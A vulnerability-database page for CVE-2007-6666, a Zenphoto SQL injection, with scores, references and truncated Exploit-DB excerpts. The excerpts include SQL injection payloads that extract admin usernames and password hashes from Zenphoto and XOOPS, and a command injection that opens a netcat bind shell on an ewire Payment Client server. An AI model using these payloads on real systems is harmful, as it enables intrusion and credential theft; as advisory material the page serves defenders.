CVE-2007-6666
published 2008-01-04CVE-2007-6666: SQL injection vulnerability in rss.php in Zenphoto 1.1 through 1.1.3 allows remote attackers to execute arbitrary SQL commands via the albumnr parameter.
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.04%
78.7th percentile
SQL injection vulnerability in rss.php in Zenphoto 1.1 through 1.1.3 allows remote attackers to execute arbitrary SQL commands via the albumnr parameter.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zenphoto | zenphoto | — | — |
| zenphoto | zenphoto | — | — |
| zenphoto | zenphoto | — | — |
| zenphoto | zenphoto | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ZenPhoto 1.1.3 - 'rss.php?albumnr' SQL Injection
exploitdb·2007-12-31
CVE-2007-6666 ZenPhoto 1.1.3 - 'rss.php?albumnr' SQL Injection
ZenPhoto 1.1.3 - 'rss.php?albumnr' SQL Injection
---
#!/usr/bin/perl -w
#################################################################################
# #
# Zenphoto 1.1.3 SQL Injection Exploit #
# #
# Discovered by: Silentz #
# Payload: Admin Username & Hash Retrieval #
# Website: http://www.w4ck1ng.com #
# #
# Vulnerable Code (rss.php): #
# #
# $albumnr = $_GET[albumnr]; #
# #
# if ($albumnr != "") #
# { $sql = "SELECT * FROM ". prefix("images") ." WHERE albumid = $albumnr #
# AND `show` = 1 ORDER BY id DESC LIMIT ".$items;} #
# else #
# { $sql = "SELECT * FROM ". prefix("images") ." WHERE `show` = 1 ORDER #
# BY id DESC LIMIT ".$items; } #
# #
# PoC: http://victim.com/zenphoto/rss.php?albumnr=1 UNION SELECT 0,0,0,(SELECT #
# value FROM zp_options WHERE id=12),(SELECT value FROM zp
Exploit-DB
ewire Payment Client 1.60/1.70 - Command Execution
exploitdb·2007-09-17
CVE-2007-4925 ewire Payment Client 1.60/1.70 - Command Execution
ewire Payment Client 1.60/1.70 - Command Execution
---
source: https://www.securityfocus.com/bid/25683/info
ewire Payment Client is prone to a vulnerability that allows attackers to execute arbitrary shell commands because the software fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary shell commands on an affected computer with the privileges of the application using the affected class utility.
ewire Payment Client 1.60 and 1.70 are vulnerable to this issue.
GET
http://www.example.com/simplePHPLinux/3payment_receive.php?paymentin
fo=`/bin/nc -l -p6666 -e /bin/bash`
$ telnet www.example.com 6666
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Exploit-DB
XOOPS Module WF-Section 1.01 - 'articleId' SQL Injection
exploitdb·2007-04-02
CVE-2007-1974 XOOPS Module WF-Section 1.01 - 'articleId' SQL Injection
XOOPS Module WF-Section 1.01 - 'articleId' SQL Injection
---
#!/usr/bin/perl
#[Script Name: XOOPS Module WF-Section : ";
$dir = ;
chop ($dir);
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}
print "User ID (uid): ";
$id = ;
chop ($id);
$target = "9999999%20union%20select%201111,2222,3333,4444,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),6666,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20xoops_users%20where%20uid%20like%20".$id.$kapan;
$target = $host.$dir.$file.$target;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$sock
No writeups or analysis indexed.
http://osvdb.org/39786http://secunia.com/advisories/28281http://www.securityfocus.com/bid/27084https://exchange.xforce.ibmcloud.com/vulnerabilities/39341https://www.exploit-db.com/exploits/4823http://osvdb.org/39786http://secunia.com/advisories/28281http://www.securityfocus.com/bid/27084https://exchange.xforce.ibmcloud.com/vulnerabilities/39341https://www.exploit-db.com/exploits/4823
2008-01-04
Published